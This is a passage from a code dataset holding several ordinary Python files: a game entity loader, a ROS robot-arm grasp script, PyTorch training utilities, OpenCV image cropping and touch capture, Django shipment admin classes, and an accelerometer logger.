self.selected_move==0:\n self.goals.append(MoveGoal(Vector(x, y)))\nclass MoveGoal(object):\n def __init__(self, target):\n self.target=target\n def update_obj(self, e, args):\n pass\n def satisfied(self, e):\n return (e.pos-self.target).magnitude<5\nai_dict={\"basic/nothing\":DoNothingAI, \"test/geojumper\":GeoJumperAI, \"basic/playerai\":PlayerAI}\nclass Entity(objects.Object):\n skills=collections.defaultdict(int)\n hp=0\n moves=[]\n energy=0\n ai=DoNothingAI\n def 
ondeath(self):\n        return 1\n    def __init__(self, x, y, who=\"\"):\n        # open the per-entity config file and parse its 'KEY:value' commands\n        f=open(who+\".txt\", \"r\")\n        setup=f.read().split(',')\n        f.close()\n        for command in setup:\n            key=command.split(':')\n            if key[0]==\"HP\":\n                self.hp=int(key[1])\n            if key[0]==\"IMG\":\n                image=\"res/sprites/\"+key[1]+\".png\"\n            if key[0]==\"AI\":\n                self.ai=ai_dict[key[1]]()\n            if key[0]==\"MOVE\":\n                # note: 'moves' is a class-level list, so appended moves are shared by all entities\n                self.moves.append(move_repo.move_dict[key[1]])\n        super(Entity, self).__init__(x=x, y=y, image=image)\n    def update(self, args):\n        self.energy+=1\n        if self.hp==0:\n            if self.ondeath():\n                self.kill()\n        self.ai.update_obj(self, args)\n        super(Entity, self).update(args)\n","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"514328626","text":"#!/usr/bin/env python\n\n\nimport rospy\nimport roslib\nimport kinematics as urkin\n# roslib.load_manifest(\"ur_kinematics\")\n# from ur_kin_py import forward, inverse\nfrom std_msgs.msg import String\nfrom industrial_msgs.msg import RobotStatus\nfrom geometry_msgs.msg import Pose, Point, Quaternion, TwistStamped, TransformStamped, Transform\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler, quaternion_slerp, euler_from_matrix, quaternion_from_matrix, euler_matrix, quaternion_matrix\nimport numpy as np\nfrom nav_msgs.msg import Path\nfrom geometry_msgs.msg import PoseStamped, Point, Vector3\nfrom collections import defaultdict\nfrom tf2_ros import Buffer, TransformListener\nfrom tf2_geometry_msgs import do_transform_pose\nfrom std_msgs.msg import Header\nfrom copy import deepcopy\nfrom math import radians, ceil\nfrom sensor_msgs.msg import JointState\nimport actionlib\nfrom control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal\nfrom trajectory_msgs.msg import JointTrajectoryPoint, JointTrajectory\nimport sys\nfrom std_srvs.srv import Empty\n\nERROR = 0\n\n# Config - These define the motion to be completed. You can modify this, but if you want multiple options, you may\n# want to modify the code to take it through a sys.argv\n# (e.g. running it like \"rosrun apple_grasper perform_grasp.py 0.05 0.20\")\nretreat_dist = 0.05 # How far back does the arm move? + means backwards\nrotation = radians(20) # How much should the end effector rotate? Currently assumes around Z axis\nvel = 0.04 # What's the speed the arm should move?\ninterp_N = 20 # How many points should be interpolated for the trajectory?\nsum_abs_radian_warn = radians(10) # If any total movement exceeds this amount, issue a warning\n\n# Frames\n# THESE FRAMES SHOULD NOT BE CHANGED because the kinematics solver assumes these references\nur_base_link = 'base'\nur_end_link = 'tool0'\n\n# THESE FRAMES CAN BE CHANGED as they are not bound to the UR5 program code\ntool_frame = 'test_frame' # What is the frame you're trying to move?\n                          # IMPORTANT! THIS FRAME MUST BE STATIC w.r.t. 
ur_end_link\nmovement_frame = 'base_link' # What frame is the movement/rotation vector defined in?\nmovement_vector = [0, -retreat_dist, 0] # What's the linear movement you want in the movement frame?\nmovement_rpy = [0, 0, rotation] # What's the rotation you want in the movement frame, centered around tool_frame's origin?\n\ndef update_error(msg):\n global ERROR\n ERROR = msg.in_error.val\n\n# def generate_ur_pose(pose):\n# quat = pose.orientation\n# rx, ry, rz = euler_from_quaternion([quat.x, quat.y, quat.z, quat.w])\n# x, y, z = pose.position.x, pose.position.y, pose.position.z\n# format_str = 'p[{}]'.format(','.join(['{:.3f}'] * 6))\n# return format_str.format(x, y, z, rx, ry, rz)\n\n# def format_array(array):\n#\n# values = ','.join(['{}'.format(x) for x in array])\n# return '[{}]'.format(values)\n#\n#\n# def format_array_decimal(array):\n# values = ','.join(['{:.2f}'.format(x) for x in array])\n# return '[{}]'.format(values)\n\n\ndef get_tf(target, source, stamp = rospy.Time(0)):\n tf_buffer.can_transform(target, source, stamp, rospy.Duration(0.5))\n tf = tf_buffer.lookup_transform(target, source, stamp)\n return tf\n\ndef point_to_array(pt):\n # Also works on vectors!\n return np.array([pt.x, pt.y, pt.z])\n\ndef quat_to_array(quat):\n return np.array([quat.x, quat.y, quat.z, quat.w])\n\ndef tare_force():\n urscript_pub.publish('zero_ftsensor()\\n')\n\n# def issue_linear_velocity_command(array):\n# array_str = format_array_decimal(array)\n# rospy.loginfo_throttle(0.025, array_str)\n# cmd = \"speedl({},-5.0,0.05)\\n\".format(array_str)\n# urscript_pub.publish(cmd)\n\ndef issue_stop():\n cmd = \"stopl(50.0)\\n\"\n urscript_pub.publish(cmd)\n\n# def generate_move_command(pose, a, v, t=0, linear=False):\n#\n# cmd = 'movel' if linear else 'movej'\n#\n# ur_pose = generate_ur_pose(pose)\n# format_str = '{}({}, a={:.3f}, v={:.3f}, t={:.3f}, r=0)'\n# return format_str.format(cmd, ur_pose, a, v, t)\n\ndef ros_pose_slerp(start, end, n):\n\n frame = None\n if isinstance(start, PoseStamped):\n frame = start.header.frame_id\n start = start.pose\n end = end.pose\n\n start_pos = point_to_array(start.position)\n end_pos = point_to_array(end.position)\n\n positions = np.linspace(start_pos, end_pos, n, endpoint=True)\n quats = [quaternion_slerp(quat_to_array(start.orientation), quat_to_array(end.orientation), i) for i in np.linspace(0, 1, n, endpoint=True)]\n\n poses = [Pose(Point(*pos), Quaternion(*quat)) for pos, quat in zip(positions, quats)]\n if frame is not None:\n header = Header()\n header.frame_id = frame\n poses_stamped = [PoseStamped(header, pose) for pose in poses]\n return poses_stamped\n return poses\n\n\n# def run_force_mode(pose, selection_vector, wrench, limits):\n# \"\"\"\n# Refer to the URScript manual for the definitions of each of the arguments.\n# :param pose: A ROS pose defining a frame in which the forces are defined.\n# :param selection_vector: A Boolean array which specifies compliant axes.\n# :param wrench: A vector for the wrench to be applied for each axis.\n# :param limits: For compliant axes, a velocity limit. 
For non-compliant axes, an absolute position limit deviation.\n# :return:\n# \"\"\"\n#\n# ur_pose = generate_ur_pose(pose)\n# selection_vector = format_array(np.array(selection_vector).astype(bool).astype(int))\n# wrench = format_array_decimal(wrench)\n# limits = format_array_decimal(limits)\n#\n# cmd = 'force_mode({}, {}, {}, 2, {})\\nsync()\\n'.format(ur_pose, selection_vector, wrench, limits)\n# urscript_pub.publish(cmd)\n\n\ndef ros_quat_to_euler(q):\n return np.array(euler_from_quaternion([q.x, q.y, q.z, q.w]))\n\ndef construct_joint_point(position, t):\n point = JointTrajectoryPoint()\n point.positions = position\n if not isinstance(t, rospy.Duration):\n t = rospy.Duration(t)\n point.velocities = [0.0] * len(position)\n point.accelerations = [0.0] * len(position)\n point.time_from_start = t\n return point\n\ndef convert_mat_to_pose(mat):\n quat = Quaternion(*quaternion_from_matrix(mat))\n pos = Point(mat[0,3], mat[1,3], mat[2,3])\n return Pose(pos, quat)\n\ndef convert_tf_to_pose(tf):\n pose = PoseStamped()\n pose.pose = Pose(Point(*point_to_array(tf.transform.translation)), tf.transform.rotation)\n pose.header.frame_id = tf.header.frame_id\n\n return pose\n\ndef convert_pose_to_tf(pose_stamped, frame_id):\n # frame_id is the ID of the frame which is located at the pose in the given frame\n tf = TransformStamped()\n tf.header.frame_id = frame_id\n tf.child_frame_id = pose_stamped.header.frame_id\n tf.transform.translation = Vector3(*point_to_array(pose_stamped.pose.position))\n tf.transform.rotation = pose_stamped.pose.orientation\n\n return tf\n\n\ndef convert_poses_to_trajectory(poses, initial_joint_state, linear_vel, leeway = 2.0, warn_threshold = 0):\n\n\n last_joints = initial_joint_state.position\n last_pos = np.array(urkin.fwd_kin(last_joints)[:3,3]).T[0]\n\n\n traj = JointTrajectory()\n traj.header.stamp = rospy.Time.now()\n traj.joint_names = initial_joint_state.name\n traj.points.append(construct_joint_point(last_joints, 0.0))\n\n # Kind of a hack, offset correction due to fwd kins not being exact\n\n believed_pos = point_to_array(urkin.fwd_kin(last_joints, o_unit='p').position)\n correction = believed_pos - point_to_array(poses[0].position)\n\n joints = [last_joints]\n\n t = 0.0\n for pose in poses:\n\n pose.position = Point(*point_to_array(pose.position) + correction)\n new_pos = point_to_array(pose.position)\n new_joints = urkin.inv_kin(pose, last_joints)\n dt = max(np.linalg.norm(new_pos - last_pos) / linear_vel * leeway, 0.01)\n t += dt\n traj.points.append(construct_joint_point(new_joints, t))\n\n last_joints = new_joints\n last_pos = new_pos\n\n joints.append(new_joints)\n\n if warn_threshold > 0:\n joints = np.array(joints)\n sum_abs_diff = np.abs(joints[:-1] - joints[1:]).sum(axis=1)\n if np.any(sum_abs_diff > warn_threshold):\n rospy.logwarn('Detected a large joint movement! 
Either near singularity or need to increase path resolution')\n sys.exit(1)\n\n goal = FollowJointTrajectoryGoal()\n goal.trajectory = traj\n\n return goal\n\n\nif __name__ == '__main__':\n\n # Initialization stuff - subscribers, publishers, service proxies, action clients\n rospy.init_node('move_arm')\n tf_buffer = Buffer()\n tf_listener = TransformListener(tf_buffer)\n rospy.Subscriber('/ur_driver/robot_status', RobotStatus, update_error, queue_size=1)\n urscript_pub = rospy.Publisher('/ur_driver/URScript', String, queue_size=1)\n traj_client = actionlib.SimpleActionClient('follow_joint_trajectory', FollowJointTrajectoryAction)\n if not traj_client.wait_for_server(rospy.Duration(5.0)):\n msg = 'Can\\'t connect to action server for trajectory uploading!'\n rospy.logwarn(msg)\n rospy.signal_shutdown(msg)\n sys.exit(1)\n\n start_recording = rospy.ServiceProxy('start_recording', Empty)\n stop_recording = rospy.ServiceProxy('stop_recording', Empty)\n\n # # Uncomment this section to allow freedriving the arm\n # # TODO: May require sending a stop_freedrive() command to the arm after setting to False - modify freedrive_node.py\n # rospy.set_param('freedrive', True)\n # raw_input('Please freedrive the arm to the desired grasping position, then hit Enter')\n # rospy.set_param('freedrive', False)\n # rospy.sleep(1.0)\n\n # Get the current location of the end effector\n stamp = rospy.Time.now()\n\n tool_to_ur_base_tf = get_tf(ur_base_link, tool_frame, stamp)\n movement_to_ur_base_tf = get_tf(ur_base_link, movement_frame, stamp)\n static_tool_to_ur_ee_pose = convert_tf_to_pose(get_tf(ur_end_link, tool_frame, stamp))\n tool_to_rotation_tf = get_tf(movement_frame, tool_frame, stamp)\n\n # Define a pose in the movement frame whose origin is at the current tool frame's origin (in the movement frame)\n # plus any desired movement, and the rotation is the desired rotation\n\n tool_origin = point_to_array(tool_to_rotation_tf.transform.translation)\n\n # TODO: This desired movement should be fine tuned to whatever application you need\n # Right now it just assumes a negative z movement, but in reality it can be whatever you need\n desired_movement = PoseStamped()\n desired_movement.header.frame_id = movement_frame\n desired_movement.pose.position = Point(*tool_origin + np.array(movement_vector))\n # Kinda hacky, sorry\n desired_rotation_mat = euler_matrix(*movement_rpy) # THIS IS WHERE YOUR DESIRED ROTATION GOES\n o = tool_to_rotation_tf.transform.rotation\n composite_rotation = desired_rotation_mat.dot(quaternion_matrix([o.x, o.y, o.z, o.w]))\n desired_movement.pose.orientation = Quaternion(*quaternion_from_matrix(composite_rotation))\n\n current_tool_pose = convert_tf_to_pose(tool_to_ur_base_tf)\n final_tool_pose = do_transform_pose(desired_movement, movement_to_ur_base_tf)\n\n # Each pose in the interpolated poses actually represents an orientation of the frame relative to the offset\n # Therefore you are transforming a static offset in the tool frame with a variable transform\n interp_poses = ros_pose_slerp(current_tool_pose, final_tool_pose, interp_N)\n interpolated_tool_poses = [do_transform_pose(static_tool_to_ur_ee_pose, convert_pose_to_tf(pose, static_tool_to_ur_ee_pose.header.frame_id)).pose for pose in interp_poses]\n\n # Convert the poses into a trajectory which can be received by the action client\n joint_start = rospy.wait_for_message('/joint_states', JointState)\n goal = convert_poses_to_trajectory(interpolated_tool_poses, joint_start, vel, warn_threshold=sum_abs_radian_warn)\n\n # Pre-grasp 
preparation\n tare_force()\n rospy.sleep(1.0)\n start_recording()\n\n # You probably want your grasping function here\n grasp = lambda: None\n grasp()\n\n # Send the trajectory to the server\n try:\n traj_client.send_goal_and_wait(goal, goal.trajectory.points[-1].time_from_start * 2)\n finally:\n issue_stop()\n\n # Final stuff\n stop_recording()\n","sub_path":"src/perform_grasp.py","file_name":"perform_grasp.py","file_ext":"py","file_size_in_byte":12471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"254475469","text":"#!/usr/bin/env python\n\nimport itertools\n\nfrom typing import Callable, Sequence, Tuple\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\nfrom torch.optim import Optimizer\nfrom torch.utils.data import DataLoader, TensorDataset, SubsetRandomSampler\n\nfrom molecular_cross_validation.train.cosine_scheduler import CosineWithRestarts\n\nTransform = Callable[[torch.Tensor], torch.Tensor]\n\n\ndef split_dataset(\n *xs: torch.Tensor, batch_size: int, indices: np.ndarray = None, n_train: int = None\n):\n if indices is None:\n indices = np.random.permutation(xs[0].shape[0])\n\n if n_train is None:\n n_train = int(0.875 * xs[0].shape[0])\n\n ds = TensorDataset(*xs)\n\n training_dl = DataLoader(\n dataset=ds,\n batch_size=batch_size,\n sampler=SubsetRandomSampler(indices[:n_train]),\n )\n\n validation_dl = DataLoader(\n dataset=ds,\n batch_size=batch_size,\n sampler=SubsetRandomSampler(indices[n_train:]),\n )\n\n return training_dl, validation_dl\n\n\ndef train_epoch(\n model: nn.Module,\n criterion: nn.Module,\n optim: Optimizer,\n data_loader: DataLoader,\n input_t: Transform,\n clip_norm: float = None,\n):\n \"\"\"Iterate through training data, compute losses and take gradient steps\n\n :param model: a torch Module that can take input data and return the prediction\n :param criterion: a loss function\n :param optim: a torch Optimizer\n :param data_loader: training dataset. Should produce a tuple of tensors: the first\n is used as input and the last is the target. If the tuple has\n only one element then it's used for both\n :param input_t: Transformation to apply to the input\n :param clip_norm: clip gradient norm to a given absolute value\n :return: total loss for the epoch, averaged over the number of batches\n \"\"\"\n total_epoch_loss = 0.0\n\n for data in data_loader:\n y = model(input_t(data[0]))\n loss = criterion(y, data[0])\n\n total_epoch_loss += loss.data.item()\n\n optim.zero_grad()\n loss.backward()\n if clip_norm is not None:\n clip_grad_norm_(model.parameters(), clip_norm)\n optim.step()\n\n return total_epoch_loss / len(data_loader)\n\n\ndef evaluate_epoch(\n model: nn.Module,\n criterion: nn.Module,\n data_loader: DataLoader,\n input_t: Transform,\n eval_i: Sequence[int],\n):\n \"\"\"Iterate through test data and compute losses\n\n :param model: a torch Module that can take input data and return the prediction\n :param criterion: a loss function\n :param data_loader: validation dataset. Should produce a tuple of tensors: the first\n is used as input and the last is the target. 
If the tuple has\n                        only one element then it's used for both\n    :param input_t: Transformation to apply to the input\n    :param eval_i: Index into the DataLoader tuple for evaluation\n    :return: total loss for the epoch, averaged over the number of batches\n    \"\"\"\n    total_epoch_loss = 0.0\n\n    for data in data_loader:\n        y = model(input_t(data[0]))\n        loss = criterion(y, *(data[i] for i in eval_i))\n\n        total_epoch_loss += loss.data.item()\n\n    return total_epoch_loss / len(data_loader)\n\n\ndef train_until_plateau(\n    model: nn.Module,\n    training_loss: nn.Module,\n    optim: Optimizer,\n    training_data: DataLoader,\n    validation_data: DataLoader,\n    input_t: Transform,\n    min_cycles: int = 3,\n    threshold: float = 0.01,\n    scheduler_kw: dict = None,\n    verbose: bool = False,\n) -> Tuple[list, list]:\n    \"\"\"Train a model with cosine scheduling until validation loss stabilizes. This\n    function uses CosineWithRestarts and trains until the validation loss stops improving.\n\n    :param model: torch Module that can take input data and return the prediction\n    :param training_loss: The loss function used for training the model\n    :param optim: torch Optimizer (will zero the gradient after testing)\n    :param training_data: Training dataset. Should produce tuples of Tensors, all but\n                          the last are considered to be input and the last is the target\n    :param validation_data: Validation dataset in the same format\n    :param input_t: Function to apply to the input\n    :param min_cycles: Minimum number of cycles to run before checking for convergence\n    :param threshold: Tolerance threshold for calling convergence\n    :param scheduler_kw: dictionary of keyword arguments for CosineWithRestarts\n    :param verbose: Print training progress to stdout\n    :return: Lists of training and validation loss values\n    \"\"\"\n\n    assert 0.0 <= threshold < 1.0\n\n    if scheduler_kw is None:\n        scheduler_kw = dict()\n\n    train_loss = []\n    val_loss = []\n\n    scheduler = CosineWithRestarts(optim, **scheduler_kw)\n    best = np.inf\n    rel_epsilon = 1.0 - threshold\n    neg_epsilon = 1.0 + threshold\n    cycle = 0\n\n    for epoch in itertools.count():\n        optim.zero_grad() # just make sure things are zeroed before train loop\n        model.train()\n\n        train_loss.append(\n            train_epoch(\n                model=model,\n                criterion=training_loss,\n                optim=optim,\n                data_loader=training_data,\n                input_t=input_t,\n                clip_norm=100.0,\n            )\n        )\n\n        model.eval()\n        val_loss.append(\n            evaluate_epoch(\n                model=model,\n                criterion=training_loss,\n                data_loader=validation_data,\n                input_t=input_t,\n                eval_i=[0],\n            )\n        )\n\n        scheduler.step()\n        if scheduler.starting_cycle:\n            if verbose:\n                print(\n                    f\"[epoch {epoch:03d}] average training loss: {train_loss[-1]:.5f}\"\n                )\n            cycle += 1\n\n        if 0 <= val_loss[-1] < best * rel_epsilon:\n            best = val_loss[-1]\n        elif 0 > val_loss[-1] and val_loss[-1] < best * neg_epsilon:\n            best = val_loss[-1]\n        elif cycle >= min_cycles:\n            break\n\n    return train_loss, val_loss\n","sub_path":"src/molecular_cross_validation/train/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"100890729","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n'''\r\n@author: Danny\r\n@contact: kedanlin@hotmail.com\r\n@file: cut_img.py\r\n@time: 2019/5/23 22:49\r\n@desc:\r\n'''\r\n\r\nimport cv2\r\n\r\n
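# Each tuple is (y0, y1, x0, x1): two rows of four answer cells,\r\n# rows y=150-355 and y=355-558, each column 206 px wide (inferred from the values below).\r\n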
answers_location = [(150,355,0,206),\r\n                    (150,355,206,412),\r\n                    (150,355,412,618),\r\n                    (150,355,618,824),\r\n                    (355,558,0,206),\r\n                    (355,558,206,412),\r\n                    (355,558,412,618),\r\n                    (355,558,618,824)]\r\nFilePath = r'./images/'\r\ndef cut_question(old_file_name, question_file_name):\r\n    img = cv2.imread(FilePath + old_file_name)\r\n    question = img[0:150,0:824]  # crop coordinates are [y0:y1, x0:x1]\r\n    cv2.imwrite(FilePath + question_file_name, question)\r\n\r\n\r\ndef cut_answer(old_file_name):\r\n    img = cv2.imread(FilePath + old_file_name)\r\n    i = 1\r\n    for al in answers_location:\r\n        answer = img[al[0]:al[1], al[2]:al[3]]\r\n        cv2.imwrite(FilePath + str(i) + '_' + old_file_name, answer)\r\n        i = i+1\r\n\r\nif __name__ == '__main__':\r\n    cut_answer('math.jpg')\r\n    cut_question('math.jpg','math_question.jpg')","sub_path":"cut_img.py","file_name":"cut_img.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"522043473","text":"#!/usr/bin/env python3\nimport numpy\nimport cv2\nimport logging\n\nclass TouchCapture:\n    def __init__(self):\n        self.initialize_detector_params()\n        self.detector = cv2.SimpleBlobDetector_create(self.params)\n\n    def open(self, camera):\n        self.cap = cv2.VideoCapture(camera)\n        # The Ailipu camera I used runs fastest at VGA\n        self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n        self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n        self.flush_frames()\n        self.reset_background(10)\n        self.update_frame()\n\n    def get_frame(self):\n        ret, image = self.cap.read()\n        return cv2.cvtColor(image,cv2.COLOR_BGR2GRAY) \n\n    def flush_frames(self):\n        # Flush some frames\n        for i in range(15):\n            self.get_frame()\n\n    # Create blob detector parameters hand tuned for this use case\n    def initialize_detector_params(self):\n        self.params = cv2.SimpleBlobDetector_Params()\n        self.params.filterByCircularity = True\n        self.params.minCircularity = 0.4\n        logging.debug(\"Circularity %d %d\", self.params.minCircularity, self.params.maxCircularity)\n\n        self.params.filterByConvexity = True\n        self.params.minConvexity = 0.4\n        logging.debug(\"Convexity %d %d\", self.params.minConvexity, self.params.maxConvexity)\n\n        self.params.filterByInertia = True\n        logging.debug(\"Inertia %d %d\", self.params.minInertiaRatio, self.params.maxInertiaRatio)\n\n        self.params.filterByArea = True\n        self.params.minArea = 10\n        self.params.maxArea = 500\n        logging.debug(\"Area %d %d\", self.params.minArea, self.params.maxArea)\n\n        self.params.minDistBetweenBlobs = 3.0\n        logging.debug(\"minDistBetweenBlobs %d\", self.params.minDistBetweenBlobs)\n\n        self.params.minRepeatability = 2\n        logging.debug(\"minRepeatability %d\", self.params.minRepeatability)\n\n        self.params.blobColor = 255\n        self.params.minThreshold = 10\n        self.params.maxThreshold = 60\n        self.params.thresholdStep = 5\n        logging.debug(\"Threshold %d %d %d\", self.params.minThreshold, self.params.maxThreshold, self.params.thresholdStep)\n\n    # Average a specified number of frames to mitigate noise\n    def reset_background(self, num_frames):\n        image = self.get_frame()\n\n        image = numpy.float32(image)/255.0\n        average = image.copy()\n\n        for i in range(num_frames):\n            image = self.get_frame()\n\n            image = numpy.float32(image)/255.0\n            cv2.accumulateWeighted(image, average, 1.0/num_frames)\n\n        self.background = numpy.uint8(average*255.0)\n\n    def update_frame(self):\n        # Capture frame-by-frame\n        self.frame = self.get_frame()\n        self.frame = cv2.subtract(self.frame, self.background)\n        return self.frame\n\n    def get_points(self):\n        # Update the blob detector\n        return self.detector.detect(self.frame)\n\n    def close(self):\n        
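# release the camera device so other clients can open it\n        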
self.cap.release()\n\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(level=logging.DEBUG)\n\n capture = TouchCapture()\n capture.open(1)\n frame = capture.update_frame()\n tick = cv2.getTickCount()\n\n while(True):\n frame = capture.update_frame()\n \n keypoints = capture.get_points()\n frame = cv2.drawKeypoints(frame, keypoints, numpy.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n\n # Time the loop\n new_tick = cv2.getTickCount()\n t = (new_tick-tick)/cv2.getTickFrequency()\n tick = new_tick\n logging.debug(\"t {:05.3f} fps {:05.2f}\".format(t, 1.0/t))\n\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\n elif key == ord('b'):\n # Reset the background image\n capture.reset_background(10)\n\n # When everything done, release the capture\n capture.close()\n cv2.destroyAllWindows()\n","sub_path":"touch/touch.py","file_name":"touch.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"591497347","text":"from django.contrib import admin\nfrom django.utils.html import format_html\nfrom django.urls import reverse\nfrom rangefilter.filter import DateRangeFilter\n\nfrom apps.shipments.models import Shipment, Location, TransitState\nfrom apps.jobs.models import AsyncJob\n\nfrom .filter import StateFilter\nfrom .historical import BaseModelHistory\n\n\nclass AsyncJobInlineTab(admin.TabularInline):\n model = AsyncJob\n fields = (\n 'job_id',\n 'state',\n 'method',\n 'created_at',\n 'last_try',\n )\n readonly_fields = (\n 'job_id',\n 'state',\n 'method',\n 'created_at',\n 'last_try',\n )\n\n def method(self, obj):\n try:\n params = obj.parameters\n return params['rpc_method']\n except KeyError:\n pass\n return \"??\"\n\n def job_id(self, obj):\n return format_html(\n '<a href=\"{}\" target=\"_blank\">{}</a>',\n reverse('admin:jobs_asyncjob_change', kwargs={'object_id': obj.id}),\n obj.id\n )\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nNON_SCHEMA_FIELDS = [\n 'asyncjob',\n 'ethaction',\n 'permissionlink',\n 'loadshipment',\n 'trackingdata',\n 'document',\n 'id',\n 'owner_id',\n 'storage_credentials_id',\n 'vault_id',\n 'vault_uri',\n 'device',\n 'shipper_wallet_id',\n 'carrier_wallet_id',\n 'moderator_wallet_id',\n 'updated_at',\n 'created_at',\n 'contract_version',\n 'updated_by',\n 'state',\n 'delayed',\n 'expected_delay_hours',\n 'exception'\n]\n\n\nclass ShipmentAdmin(admin.ModelAdmin):\n # Read Only admin page until this feature is worked\n list_display = ('id', 'owner_id', 'shippers_reference', 'created_at', 'updated_at', 'shipment_state', )\n fieldsets = (\n (None, {\n 'classes': ('extrapretty', ),\n 'fields': (\n 'id',\n ('updated_at', 'created_at',),\n ('owner_id', 'updated_by',),\n ('shipper_wallet_id', 'carrier_wallet_id', 'moderator_wallet_id',),\n ('storage_credentials_id', 'vault_id',),\n 'state',\n 'vault_uri',\n 'device',\n 'contract_version',\n )\n }),\n ('Shipment Schema Fields', {\n 'classes': ('collapse',),\n 'description': f'Fields in the {format_html(\"<a href={}>Schema</a>\", \"http://schema.shipchain.io\")}',\n 'fields': [field.name for field in Shipment._meta.get_fields() if field.name not in NON_SCHEMA_FIELDS]\n })\n )\n\n inlines = [\n AsyncJobInlineTab,\n ]\n\n search_fields = ('id', 'shipper_wallet_id', 
'carrier_wallet_id', 'moderator_wallet_id', 'state', 'owner_id',\n                     'ship_from_location__name', 'ship_to_location__name', 'final_destination_location__name',\n                     'bill_to_location__name', )\n\n    list_filter = [\n        ('created_at', DateRangeFilter),\n        ('updated_at', DateRangeFilter),\n        ('delayed', admin.BooleanFieldListFilter),\n        ('state', StateFilter),\n    ]\n\n    def shipment_state(self, obj):\n        return TransitState(obj.state).label.upper()\n\n    def has_delete_permission(self, request, obj=None):\n        return False\n\n    def has_add_permission(self, request):\n        return False\n\n    def has_change_permission(self, request, obj=None):\n        return False\n\n\nclass HistoricalShipmentAdmin(BaseModelHistory, ShipmentAdmin):\n    readonly_fields = [field.name for field in Shipment._meta.get_fields()]\n\n\nclass LocationAdmin(BaseModelHistory):\n    fieldsets = [(None, {'fields': [field.name for field in Location._meta.local_fields]})]\n\n    readonly_fields = [field.name for field in Location._meta.get_fields()]\n\n    search_fields = ('id', 'name__contains', )\n","sub_path":"apps/shipments/admin/shipment.py","file_name":"shipment.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"173177043","text":"import spidev\nimport time\nfrom time import perf_counter\nimport csv\nimport datetime\nimport ADXL362\n\n\n\ndef main():\n\n    # Create the file to write to\n    dt_now = datetime.datetime.now()\n    filename = './csv/' + dt_now.strftime('%m-%d_%H-%M-%S') + '.csv'\n    print(dt_now.strftime('%m%d_%H-%M-%S'))\n\n    # Open the file\n    f = open(filename, 'w')\n    writer = csv.writer(f, lineterminator='\\n')\n    csvlist = []\n\n    # # Initial setup\n    # spi = spidev.SpiDev() \n    # spi.open(0,0)\n    # spi.mode = 3 #ADXL345: this device runs in SPI mode 3\n    # spi.max_speed_hz = 1000000\n    \n    # spi.xfer2([0x2D, 0x02]) #Start measurement\n\n    # # Initial setup\n    # spi2 = spidev.SpiDev() \n    # spi2.open(0,1)\n    # spi2.mode = 3 #ADXL345: this device runs in SPI mode 3\n    # spi2.max_speed_hz = 1000000\n    \n    # spi2.xfer2([0x2D, 0x02]) #Start measurement\n\n    accel_0 = ADXL362.ADXL362(0, 0)\n    accel_0.begin_measure()\n    accel_1 = ADXL362.ADXL362(0,1)\n    accel_1.begin_measure()\n\n    try:\n        while True:\n            #Read x,y,z acceleration (two's complement)\n\n            # x_data_list = spi.xfer2([0xc0|0x32, 0x00, 0x00])\n            # y_data_list = spi.xfer2([0xc0|0x34, 0x00, 0x00])\n            # z_data_2_1_list = spi.xfer2([0xc0|0x36, 0x00, 0x00])\n            # x_data = x_data_list[1] | (x_data_list[2] << 8)\n            # y_data = y_data_list[1] | (y_data_list[2] << 8)\n            # z_data_1 = z_data_1_list[1] | (z_data_1_list[2] << 8\n\n            x_data_1 = accel_0.read_xyz()[0]\n            y_data_1 = accel_0.read_xyz()[1]\n            z_data_1 = accel_0.read_xyz()[2]\n\n            #Convert two's complement to decimal\n            if(x_data_1 & 0x8000):\n                x_data_1 = ((~x_data_1 & 0xFFFF) + 1)*-1\n            if(y_data_1 & 0x8000): \n                y_data_1 = ((~y_data_1 & 0xFFFF) + 1)*-1\n            if(z_data_1 & 0x8000):\n                z_data_1 = ((~z_data_1 & 0xFFFF) + 1)*-1\n            #Convert to acceleration (D range ±2g)\n            x_data_1 = 2 * 9.8 * x_data_1 / 0x7FFF\n            y_data_1 = 2 * 9.8 * y_data_1 / 0x7FFF\n            z_data_1 = 2 * 9.8 * z_data_1 / 0x7FFF\n            csvlist.append([perf_counter(),x_data_1,y_data_1,z_data_1,\"#1\"])\n\n            print(perf_counter(),\"#1\")\n            print('x: {:4.2f}, y: {:4.2f}, z: {:4.2f} [m/s^2]'.format(x_data_1, y_data_1, z_data_1))\n            # time.sleep(0.1)\n\n            # #Read x,y,z acceleration (two's complement)\n            # x_data_2_list = spi2.xfer2([0xc0|0x32, 0x00, 0x00])\n            # y_data_1_list = spi2.xfer2([0xc0|0x34, 0x00, 0x00])\n            # z_data_2_list = spi2.xfer2([0xc0|0x36, 0x00, 0x00])\n            # x_data_2 = x_data_2_list[1] | (x_data_2_list[2] << 8)\n            # y_data_2 = y_data_2_list[1] | (y_data_2_list[2] << 8)\n            # z_data_2 = z_data_2_list[1] | 
